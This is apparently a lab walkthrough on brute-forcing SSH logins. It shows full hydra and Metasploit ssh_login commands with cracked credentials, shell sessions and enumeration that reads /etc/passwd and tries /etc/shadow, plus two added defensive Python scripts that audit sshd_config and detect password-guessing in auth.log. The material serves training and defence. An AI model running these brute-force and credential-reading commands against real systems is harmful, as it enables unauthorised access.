Exploiting SSH
SSH (Secure Shell) is a remote administration protocol that offers encryption and is the successor to Telnet.
It is typically used for remote access to servers and systems.
SSH uses TCP port 22 by default; however, like other services, it can be configured to use any other open TCP port.
SSH authentication can be configured in two ways:
- Username & password authentication
- Key based authentication
Key based authentication involves the use of two keys, or rather a key pair consisting of a public key and a private key: the public key is placed on the server and the private key is given to the person who is going to remotely access the system via SSH. With key based authentication there is no username and password prompt; you log in to the target system by presenting the private key, and only one person holds that private key.
In the case of username and password authentication, we can perform a brute-force attack on the SSH server in order to identify legitimate credentials and consequently gain access to the target system.
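The two authentication modes above map directly onto sshd settings, and those settings decide whether the brute-force approach described next is viable at all. The following added example (not code from the original post) audits an OpenSSH sshd_config for the keywords that matter; the two configs embedded in it are constructed for illustration, and the MaxAuthTries ceiling of 3 is an assumed policy value.

```python
"""Audit an OpenSSH sshd_config for settings that leave the daemon exposed to
password guessing. Added example, not code from the original post; the two
configs below are constructed for illustration."""
import re

# Values OpenSSH applies when a keyword is absent from the file.
OPENSSH_DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
}


def parse_sshd_config(text):
    """Return {keyword: value} (both lower-cased) for the global section.

    sshd honours the first occurrence of a keyword and ignores later
    duplicates, hence setdefault(). Match blocks are skipped because their
    settings only apply conditionally.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("match "):
            break
        # sshd accepts "Keyword value" as well as "Keyword=value"
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        settings.setdefault(parts[0].lower(), parts[1].strip().lower())
    return settings


def audit(text):
    """Return a list of findings; an empty list means the config passes."""
    cfg = dict(OPENSSH_DEFAULTS)
    cfg.update(parse_sshd_config(text))
    findings = []
    if cfg["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: wordlist attacks such as hydra/ssh_login can succeed")
    if cfg["pubkeyauthentication"] != "yes":
        findings.append("PubkeyAuthentication no: key-based login is unavailable")
    if cfg["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root can be targeted by password guessing")
    if int(cfg["maxauthtries"]) > 3:  # assumed policy ceiling
        findings.append(f"MaxAuthTries {cfg['maxauthtries']}: several guesses allowed per connection")
    return findings


# Constructed configs: the first resembles a stock install that still accepts
# passwords, the second enforces key-based authentication only.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
MaxAuthTries 3
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit(text)
        print(f"[{name}] {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

Running the script reports three findings for the weak config (password logins, root logins and the default six tries per connection) and none for the hardened one; `sshd -T` on a live host prints the effective configuration in the same keyword/value form and can be fed to `audit()` directly.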
Demo: Exploiting SSH
ifconfig
eth1: inet 192.156.211.2
nmap -sV 192.156.211.3
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 192.156.211.3 -t 4 ssh
Display the groups that the sysadmin user is a member of. It is not a member of the sudo group, which means we don't have any elevated privileges.
Enumerate the distribution release version.
Get kernel version.
Enumerate the users on the system.
ssh sysadmin@192.156.211.3
yes
hailey
sysadmin@victim-1:~$ whoami
sysadmin@victim-1:~$ groups sysadmin
sysadmin@victim-1:~$ cat /etc/*issue
sysadmin@victim-1:~$ uname -r
sysadmin@victim-1:~$ cat /etc/passwd
SSH Login
Overview
In this lab, run the following auxiliary modules against the target:
- auxiliary/scanner/ssh/ssh_version
- auxiliary/scanner/ssh/ssh_login
Instructions:
- This lab is dedicated to you! There are no other users on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.2. Run "ip addr" to find the values of X and Y.
- The target server should be located at IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- Use /usr/share/metasploit-framework/data/wordlists/common_users.txt as the username dictionary
- Use /usr/share/metasploit-framework/data/wordlists/common_passwords.txt as the password dictionary
My own approach
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.5 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:05 txqueuelen 0 (Ethernet)
RX packets 124 bytes 11106 (10.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 107 bytes 343757 (335.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.180.250.2 netmask 255.255.255.0 broadcast 192.180.250.255
ether 02:42:c0:b4:fa:02 txqueuelen 0 (Ethernet)
RX packets 16 bytes 1432 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 18 bytes 1656 (1.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 1656 (1.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@attackdefense:~# nmap -sV 192.180.250.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-20 03:39 UTC
Nmap scan report for target-1 (192.180.250.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:42:C0:B4:FA:03 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 192.180.250.3 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-20 03:49:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 350 login tries (l:7/p:50), ~88 tries per task
[DATA] attacking ssh://192.180.250.3:22/
[22][ssh] host: 192.180.250.3 login: sysadmin password: hailey
[STATUS] 74.00 tries/min, 74 tries in 00:01h, 276 to do in 00:04h, 4 active
[22][ssh] host: 192.180.250.3 login: rooty password: pineapple
[22][ssh] host: 192.180.250.3 login: demo password: butterfly1
[22][ssh] host: 192.180.250.3 login: auditor password: xbox360
[STATUS] 67.33 tries/min, 202 tries in 00:03h, 148 to do in 00:03h, 4 active
[STATUS] 60.50 tries/min, 242 tries in 00:04h, 108 to do in 00:02h, 4 active
sysadmin:hailey
rooty:pineapple
demo:butterfly1
auditor:xbox360
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 30 yes Timeout for the SSH probe
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.180.250.3
RHOSTS => 192.180.250.3
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.180.250.3:22 - SSH server version: SSH-2.0-OpenSSH_7.9p1 Ubuntu-10 ( service.version=7.9p1 openssh.comment=Ubuntu-10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=19.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:19.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.180.250.3:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
SSH Login Check Scanner
This module will test SSH logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so that you can track your access.
msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.180.250.3
RHOSTS => 192.180.250.3
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.180.250.3:22 - Success: 'sysadmin:hailey' ''
[*] Command shell session 1 opened (192.180.250.2:35857 -> 192.180.250.3:22) at 2022-10-20 04:06:05 +0000
[+] 192.180.250.3:22 - Success: 'rooty:pineapple' ''
[*] Command shell session 2 opened (192.180.250.2:38921 -> 192.180.250.3:22) at 2022-10-20 04:07:27 +0000
[+] 192.180.250.3:22 - Success: 'demo:butterfly1' ''
[*] Command shell session 3 opened (192.180.250.2:39435 -> 192.180.250.3:22) at 2022-10-20 04:08:57 +0000
[+] 192.180.250.3:22 - Success: 'auditor:xbox360' ''
[*] Command shell session 4 opened (192.180.250.2:38927 -> 192.180.250.3:22) at 2022-10-20 04:10:43 +0000
[+] 192.180.250.3:22 - Success: 'anon:741852963' ''
[*] Command shell session 5 opened (192.180.250.2:44943 -> 192.180.250.3:22) at 2022-10-20 04:12:41 +0000
[+] 192.180.250.3:22 - Success: 'administrator:password1' ''
[*] Command shell session 6 opened (192.180.250.2:45943 -> 192.180.250.3:22) at 2022-10-20 04:15:10 +0000
[+] 192.180.250.3:22 - Success: 'diag:secret' ''
[*] Command shell session 7 opened (192.180.250.2:41153 -> 192.180.250.3:22) at 2022-10-20 04:17:28 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sysadmin:hailey
rooty:pineapple
demo:butterfly1
auditor:xbox360
anon:741852963
administrator:password1
diag:secret
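Every guess that hydra or ssh_login makes is recorded by sshd on the target, and that burst of failures followed by an "Accepted password" line is exactly what a defender watches for. The following added example (not code from the original post or from Metasploit) implements a sliding-window detector over OpenSSH auth.log lines; the log lines are constructed to resemble what the runs above would leave behind, and the threshold, window length and log year are assumptions.

```python
"""Flag SSH password-guessing bursts in OpenSSH auth.log lines and report which
accounts the guessing source then logged into. Added example, not part of the
original post; SAMPLE_LOG is constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the "Failed/Accepted password for [invalid user] X from IP port N ssh2"
# lines that sshd writes through syslog.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)


def parse_line(line, year=2022):
    """Parse one sshd auth line; syslog timestamps carry no year, so one is assumed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Sliding-window detector (threshold and window are assumed tuning values).

    A source is flagged once it produces `threshold` failed logins within
    `window_s` seconds. Returns {src: {"failures", "distinct_users",
    "successes"}}; a non-empty "successes" list means the guessing paid off.
    """
    recent = defaultdict(deque)  # src -> timestamps of failures inside the window
    failures = defaultdict(int)
    users = defaultdict(set)
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src = ev["src"]
        if ev["result"] == "Failed":
            failures[src] += 1
            users[src].add(ev["user"])
            q = recent[src]
            q.append(ev["ts"])
            # drop failures that have aged out of the window
            while (ev["ts"] - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged[src] = {"successes": []}
        elif src in flagged:
            # an Accepted line from an already-flagged source: the guess worked
            flagged[src]["successes"].append(ev["user"])
    for src, info in flagged.items():
        info["failures"] = failures[src]
        info["distinct_users"] = len(users[src])
    return flagged


# Constructed sample: one source cycles through usernames two seconds apart and
# finally lands on sysadmin; a second source is a single mistyped login.
SAMPLE_LOG = """\
Oct 20 03:49:10 victim-1 sshd[2201]: Failed password for rooty from 192.180.250.2 port 35857 ssh2
Oct 20 03:49:12 victim-1 sshd[2203]: Failed password for invalid user admin from 192.180.250.2 port 35858 ssh2
Oct 20 03:49:14 victim-1 sshd[2205]: Failed password for sysadmin from 192.180.250.2 port 35859 ssh2
Oct 20 03:49:16 victim-1 sshd[2207]: Failed password for invalid user test from 192.180.250.2 port 35860 ssh2
Oct 20 03:49:18 victim-1 sshd[2209]: Failed password for demo from 192.180.250.2 port 35861 ssh2
Oct 20 03:49:20 victim-1 sshd[2211]: Failed password for auditor from 192.180.250.2 port 35862 ssh2
Oct 20 03:49:21 victim-1 sshd[2213]: Failed password for sysadmin from 10.1.0.7 port 50120 ssh2
Oct 20 03:50:01 victim-1 sshd[2215]: Accepted password for sysadmin from 192.180.250.2 port 35863 ssh2
"""

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['failures']} failures over {info['distinct_users']} users, "
              f"successful logins: {info['successes'] or 'none'}")
```

With the sample above only 192.180.250.2 is flagged (six failures across six usernames, then a successful login as sysadmin); the single failure from 10.1.0.7 never reaches the threshold. Lowering `-t` in hydra or `BRUTEFORCE_SPEED` in ssh_login spreads guesses out, which is why the window length matters as much as the count.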
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell unknown SSH sysadmin:hailey (192.180.250.3:22) 192.180.250.2:35857 -> 192.180.250.3:22 (192.180.250.3)
2 shell unknown SSH rooty:pineapple (192.180.250.3:22) 192.180.250.2:38921 -> 192.180.250.3:22 (192.180.250.3)
3 shell unknown SSH demo:butterfly1 (192.180.250.3:22) 192.180.250.2:39435 -> 192.180.250.3:22 (192.180.250.3)
4 shell unknown SSH auditor:xbox360 (192.180.250.3:22) 192.180.250.2:38927 -> 192.180.250.3:22 (192.180.250.3)
5 shell unknown SSH anon:741852963 (192.180.250.3:22) 192.180.250.2:44943 -> 192.180.250.3:22 (192.180.250.3)
6 shell unknown SSH administrator:password1 (192.180.250.3:22) 192.180.250.2:45943 -> 192.180.250.3:22 (192.180.250.3)
7 shell unknown SSH diag:secret (192.180.250.3:22) 192.180.250.2:41153 -> 192.180.250.3:22 (192.180.250.3)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
Welcome to Ubuntu 19.04 (GNU/Linux 5.4.0-125-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
whoami
sysadmin
groups sysadmin
sysadmin : sysadmin
cat /etc/*issue
Ubuntu 19.04 \n \l
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sysadmin:x:1000:1000:,,,:/home/sysadmin:/bin/bash
rooty:x:1001:1001:,,,:/home/rooty:/bin/bash
demo:x:1002:1002:,,,:/home/demo:/bin/bash
auditor:x:1003:1003:,,,:/home/auditor:/bin/bash
anon:x:1004:1004:,,,:/home/anon:/bin/bash
administrator:x:1005:1005:,,,:/home/administrator:/bin/bash
diag:x:1006:1006:,,,:/home/diag:/bin/bash
cat /etc/shadow
cat: /etc/shadow: Permission denied
cat /flag
eb09cc6f1cd72756da145892892fbf5a
Solution
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1526.pdf